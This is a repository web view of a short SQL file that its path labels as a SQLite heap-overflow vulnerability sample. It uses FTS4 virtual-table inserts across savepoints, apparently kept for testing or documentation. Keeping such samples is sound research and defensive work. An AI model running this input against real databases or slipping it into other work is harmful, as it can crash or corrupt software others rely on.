about summary refs log tree commit diff
path: root/docs/vuln_samples/sqlite-heap-overflow.sql
blob: 066fc835e9334ec43333647b8fdee7e361d5e7d2 (plain) (blame)
1
2
DROP TABLE IF EXISTS t;CREATE VIRTUAL TABLE t0 USING fts4();insert into t0 select zeroblob(0);SAVEPOINT O;insert into t0
select(0);SAVEPOINT E;insert into t0 SELECT 0 UNION SELECT 0'x'ORDER BY x;